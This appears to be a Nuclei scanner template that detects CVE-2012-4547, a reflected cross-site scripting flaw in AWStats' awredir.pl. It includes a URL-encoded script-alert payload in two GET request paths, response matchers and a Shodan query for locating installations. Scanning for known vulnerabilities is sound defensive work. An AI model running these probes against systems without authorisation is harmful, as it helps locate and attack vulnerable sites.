Description
AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
id: CVE-2012-4547
info:
name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter.
reference:
- https://www.exploit-db.com/exploits/36164
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
- http://openwall.com/lists/oss-security/2012/10/29/7
- http://openwall.com/lists/oss-security/2012/10/26/1
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2012-4547
cwe-id: CWE-79
epss-score: 0.05796
epss-percentile: 0.92734
cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: laurent_destailleur
product: awstats
shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats"
tags: cve2012,cve,xss,awstats,edb,laurent_destailleur,vuln
http:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100abc478edc93ca65fdbee6f3a347260093838de7d1c8988d4cf73e8eda91b4dd1022100a219e80b908f1d862cdac16543a7fb07fca9e3ca79ad4b9f055d04114f998bfb:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.